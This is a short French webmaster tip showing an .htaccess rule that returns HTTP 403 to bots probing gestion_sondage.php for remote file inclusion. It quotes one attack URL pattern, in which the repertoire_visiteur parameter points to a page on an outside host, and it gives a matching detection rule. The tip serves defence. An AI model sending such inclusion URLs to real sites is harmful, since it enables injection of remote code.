HTACCESS

Empecher le hack via gestion_sondage.php

Les robots des hackers qui crawlent le web essayent de trouver des failles de sécurité à vos scripts pour injecter en générale des urls. L'un de ces robots utilise un script de sondage avec un paramètre repertoire_visiteur.

Les urls sont sous la forme: http://www.example.com/gestion_sondage.php?repertoire_visiteur=http://www.sitepourri.com/page.txt???

Pour contrer ces robots: la solution consiste à retourner un code HTTP 403 en utilisant le flag F (forbidden).

RewriteEngine on
RewriteCond %{QUERY_STRING} ^(.*&)?repertoire_visiteur=http://
RewriteRule gestion_sondage.php$ - [F,L]
PHP